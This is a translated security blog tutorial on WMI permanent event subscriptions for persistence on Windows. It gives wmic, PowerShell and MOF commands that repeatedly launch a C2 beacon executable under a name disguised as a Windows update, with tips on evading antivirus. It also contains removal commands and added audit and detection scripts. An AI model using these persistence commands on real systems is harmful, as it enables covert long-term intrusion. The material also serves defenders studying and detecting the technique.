WMI utilization (permission maintenance)

Posted by gfX on Thu, 20 Jan 2022 03:08:12 +0100

Preface

Author: pingpig @ Dark Blue Attack and Defense Laboratory

After a brief introduction to WMI, we moved on to lateral movement, covering information gathering and tool usage. So once we have obtained access for a short time, how do we make it persist, that is, how do we maintain that access (permission maintenance)? After reading a number of articles from China and abroad, the author found that WMI persistence is mostly a matter of WMI events, which are divided into permanent and temporary events. This article explains WMI events with reference to several blog posts; readers are welcome to point out any shortcomings.

Related articles:

· WMI explanation (what is it, what to do, why)

· WMI utilization (lateral movement)

What are WMI events

A WMI event is a notification raised when the state of a particular object changes, including when an instance is created, modified or deleted; these notifications can be subscribed to with wmic or PowerShell. In general, almost any change in WMI is signalled by a WMI event. Event consumers fall into two kinds, temporary and permanent. A temporary consumer only receives the events it subscribed to for as long as the subscribing process is running. A permanent consumer is registered in the WMI repository as an instance of a consumer class and stays there, across reboots, until it is explicitly unregistered. For that reason permission maintenance generally relies on WMI permanent events. The official documentation on WMI events, and some blog explanations:

· WMI event notification

· Receiving WMI events

Querying events

List event filters

Get-WMIObject -Namespace root\Subscription -Class __EventFilter

List event consumers

Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

List event bindings

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

Deleting events

Delete event filter

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Event filter name'" | Remove-WmiObject -Verbose

Delete event consumer

Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Event consumer name'" | Remove-WmiObject -Verbose

Delete event binding

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Event binding name%'" | Remove-WmiObject -Verbose
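As an added defensive check (example code written for this article, not part of the original post or of the AxelPotato/WMI project), the following PowerShell function walks every binding in root\subscription, resolves it to its filter and consumer, and flags the combination the commands in this article create: a code-executing consumer bound to a timer, process or logon trigger. The default SCM Event Log binding present on every Windows install is skipped; the regexes used as "suspicious" heuristics are this example's own assumptions.

```powershell
# Added audit example (not from the original article): enumerate permanent WMI
# subscriptions and flag bindings of the kind the wmic/PowerShell steps create.
function Get-WmiSubscriptionAudit {
    $ns = 'root\subscription'
    foreach ($b in (Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)) {
        # Filter and Consumer are object-path strings; [wmi] resolves them to instances
        $filter   = [wmi]$b.Filter
        $consumer = [wmi]$b.Consumer
        $type     = $consumer.__CLASS

        # Default binding present on every Windows install; not interesting
        if ($filter.Name -eq 'SCM Event Log Filter' -and $type -eq 'NTEventLogEventConsumer') { continue }

        $action = switch ($type) {
            'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
            'ActiveScriptEventConsumer' { if ($consumer.ScriptFileName) { $consumer.ScriptFileName } else { $consumer.ScriptText } }
            default                     { '' }
        }

        # Heuristics (this example's own): code-executing consumer, common persistence triggers
        $reasons = @()
        if ($type -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer') {
            $reasons += "consumer type $type executes code"
        }
        if ($filter.Query -match '__TimerEvent|__InstanceCreationEvent|__InstanceModificationEvent|Win32_ProcessStartTrace|Win32_LogonSession') {
            $reasons += 'filter triggers on timer/process/logon activity'
        }
        if ($action -match 'cmd\.exe|powershell|\.exe|\.ps1|\.dll|\.vbs|\.js') {
            $reasons += 'consumer launches a program or script'
        }

        [pscustomobject]@{
            Binding      = $b.__RELPATH
            FilterName   = $filter.Name
            Query        = $filter.Query
            ConsumerType = $type
            Action       = $action
            Suspicious   = ($reasons.Count -gt 0)
            Reasons      = ($reasons -join '; ')
        }
    }
}

# Show only suspicious entries; drop the Where-Object to list everything
Get-WmiSubscriptionAudit | Where-Object Suspicious | Format-List
```

Run it as an administrator; anything it flags can then be removed with the three Remove-WmiObject commands above, binding first.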

WMI permanent events

Note: if no polling interval is specified for the query, the WMI query is only polled again after the machine restarts. Note also that WMI can use almost any trigger condition, such as a user logging off, or a program starting or exiting.

Adding a permanent event with wmic

Register a WMI event filter

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BugSecFilter", EventNamespace = "root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'BugSecFilter'"

Register a WMI event consumer

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BugSecConsumer", CommandLineTemplate="cmd.exe /c  c:\beacon.exe"

Bind event consumers to event filters

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter='\\.\root\subscription:__EventFilter.Name="BugSecFilter"', Consumer='\\.\root\subscription:CommandLineEventConsumer.Name="BugSecConsumer"'

Adding a permanent event with PowerShell

Note: you can also add a PowerShell timer. If you need to call back to a C2, replace the Payload with the C2's exe, dll or ps1. The following parameters need to be adjusted:

IntervalBetweenEvents ### the polling interval, in milliseconds.
Name in $EventFilterArgs ### the filter name.
Query ### the WQL statement in the script below; the TimerID must match the one in $TimerArgs.
$FinalPayload ### the Payload: a PowerShell, cmd or other command to execute.
Name in $CommandLineConsumerArgs ### the consumer name.
$TimerArgs = @{
    IntervalBetweenEvents = ([UInt32] 2000) # interval in milliseconds (2000 ms = 2 s)
    SkipIfPassed = $False
    TimerId = "Trigger" };

$EventFilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = "Windows update trigger"
    Query = "SELECT * FROM __TimerEvent WHERE TimerID = 'Trigger'"
    QueryLanguage = 'WQL' };
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs;

$FinalPayload = 'cmd.exe /c c:\beacon.exe'
$CommandLineConsumerArgs = @{
    Name = "Windows update consumer"
    CommandLineTemplate = $FinalPayload };
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs;

$FilterToConsumerArgs = @{
    Filter = $Filter
    Consumer = $Consumer };
$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs;

Note: the WQL statement in the script above can also use WITHIN to specify a polling interval in seconds, but the TimerID must be defined in advance. The PS1 script can be improved further: adding and removing the backdoor can be combined into one script, and the AV-evasion step can be handled by obfuscating or encoding it.

SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'Trigger'

Calling back to C2

Note: replace the Payload in the PowerShell script above for local execution, save it as a .ps1 file and adjust its polling interval. If you want to turn it into a remote-download form, the PowerShell needs AV-evasion treatment.

After running the ps1 script, the C2 session came online successfully.

Adding the event with a MOF file

Note: when adding the event through a MOF file, the author was able to add the event normally after compilation, but the specified command failed to execute.

#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{
    Name = "test1comsumer";
    RunInteractively=false;
    CommandLineTemplate="cmd.exe /c c:\beacon.exe";
};

instance of __EventFilter as $Filt
{
    Name = "test1filter";
    EventNamespace = "root\\cimv2";
    Query ="SELECT * FROM __TimerEvent  WITHIN 10 WHERE TimerID = 'test1filter'";
    QueryLanguage = "WQL";
};

instance of __FilterToConsumerBinding
{
    Filter = $Filt;
    Consumer = $Cons;
};

Compile:

mofcomp.exe wmi.mof

The event was added successfully.
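The registrations performed by the wmic, PowerShell and MOF steps in this article each produce event ID 5861 in the Microsoft-Windows-WMI-Activity/Operational log (Windows 10 / Server 2016 and later). As an added detection example, not from the original post: this function pulls those events and extracts the filter, consumer, query and command line from the message text. The regexes assume the message layout seen on those Windows versions; that layout is an assumption of this example.

```powershell
# Added detection example (not from the original article): list permanent
# subscription registrations recorded as event 5861 in the WMI-Activity log.
function Get-WmiSubscriptionRegistrations {
    param([int]$Days = 30)
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-WMI-Activity/Operational'
        Id        = 5861
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue   # no error when the log has no matches

    foreach ($e in $events) {
        $m = $e.Message
        # Assumed message layout: 'Eventfilter = <name> (...); Consumer = <class>="<name>";
        # PossibleCause = ... Query = "<WQL>" ... CommandLineTemplate = "<cmd>" ...'
        $filterName = if ($m -match 'Eventfilter = ([^;\r\n(]+)')      { $Matches[1].Trim() } else { '' }
        $consumer   = if ($m -match 'Consumer = ([^;\r\n(]+)')         { $Matches[1].Trim() } else { '' }
        $query      = if ($m -match 'Query = "([^"]*)"')               { $Matches[1] } else { '' }
        $cmd        = if ($m -match 'CommandLineTemplate = "([^"]*)"') { $Matches[1] } else { '' }

        [pscustomobject]@{
            Time        = $e.TimeCreated
            Filter      = $filterName
            Consumer    = $consumer
            Query       = $query
            CommandLine = $cmd
            # Consumer classes that run commands or scripts are the ones to triage first
            Suspicious  = ($consumer -match '^(CommandLineEventConsumer|ActiveScriptEventConsumer)')
        }
    }
}

Get-WmiSubscriptionRegistrations -Days 90 | Sort-Object Time -Descending | Format-Table -AutoSize
```

The log entry records the registration time, which the live enumeration commands earlier in the article cannot tell you.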

Reference: https://github.com/AxelPotato/WMI